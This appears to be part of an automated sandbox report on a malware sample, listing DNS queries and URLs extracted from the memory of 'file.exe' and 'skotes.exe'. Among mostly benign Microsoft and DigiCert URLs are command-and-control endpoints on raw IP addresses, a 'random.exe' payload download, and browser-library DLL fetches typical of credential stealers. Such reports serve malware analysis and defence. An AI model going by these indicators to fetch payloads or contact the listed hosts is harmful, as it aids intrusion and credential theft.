Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

DoH DNS queries detected: name: api.msn.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4831Host: login.live.com

Source: file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeV
Source: file.exe, 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2719068067.0000000000257000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllj7
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllx7
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2744608109.00000000236C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllN7
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll9
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll:
Source: file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2719068067.0000000000257000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php874C20
Source: file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpFv
Source: file.exe, 00000000.00000002.2719068067.0000000000257000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpKEHDHC.exeata;
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpgPreference.Verbt
Source: file.exe, 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phphz
Source: file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~u
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/l
Source: file.exe, 00000000.00000002.2719068067.0000000000257000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206ngineer
Source: skotes.exe, 00000020.00000002.3410736352.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpI
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpi
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11//Zu7JuNko/index.php-
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe0encodedD
Source: skotes.exe, 00000020.00000002.3410736352.00000000010DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe1009141001
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe1009141001=
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe31d
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe3b3
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe3b31
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe5062384
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe5062384760
Source: skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exe506238476j
Source: skotes.exe, 00000020.00000002.3410736352.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exeC
Source: skotes.exe, 00000020.00000002.3410736352.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/random.exeM
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_532.4.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2749300757.00000000733BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2748501103.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2740856588.000000001D5BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: FHDAFIID.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_532.4.dr	String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: e4cdfaac-96a9-4551-87b6-68e32893b181.tmp.9.dr	String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.9.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.8.dr	String found in binary or memory: https://c.msn.com/
Source: FHDAFIID.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.8.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.8.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 235cc606-a233-4fce-9d1e-57c163d2a5e0.tmp.9.dr, e4cdfaac-96a9-4551-87b6-68e32893b181.tmp.9.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json0.8.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 235cc606-a233-4fce-9d1e-57c163d2a5e0.tmp.9.dr, e4cdfaac-96a9-4551-87b6-68e32893b181.tmp.9.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Reporting and NEL.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report
Source: 2cc80dabc69f58b6_0.8.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.9.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json0.8.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.8.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: e4cdfaac-96a9-4551-87b6-68e32893b181.tmp.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log8.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log8.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log8.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log10.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr, HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
